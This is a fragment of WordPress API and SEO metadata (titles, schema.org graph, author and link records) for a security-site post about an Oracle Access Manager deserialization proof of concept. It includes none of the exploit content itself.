redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-10T13:49:50+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=40108\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=40108#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=40108","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250 - zero redgem","og_description":"{“lastseen”:”2026-02-10T19:01:58″,”description”:”Proof of concept exploit for an unauthenticated Java deserialization vulnerability in the OpenSSO Agent component of Oracle Access Manager that allows remote attackers to execute...","og_url":"https:\/\/zero.redgem.net\/?p=40108","og_site_name":"zero redgem","article_published_time":"2026-02-10T13:49:50+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=40108#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=40108"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250","datePublished":"2026-02-10T13:49:50+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=40108"},"wordCount":2820,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=40108#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=40108","url":"https:\/\/zero.redgem.net\/?p=40108","name":"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-10T13:49:50+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=40108#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=40108"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=40108#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Oracle Access Manager 12.2.1.4.0 Insecure Deserialization_PACKETSTORM:215250"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40108","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=40108"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/40108\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=40108"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=40108"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=40108"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}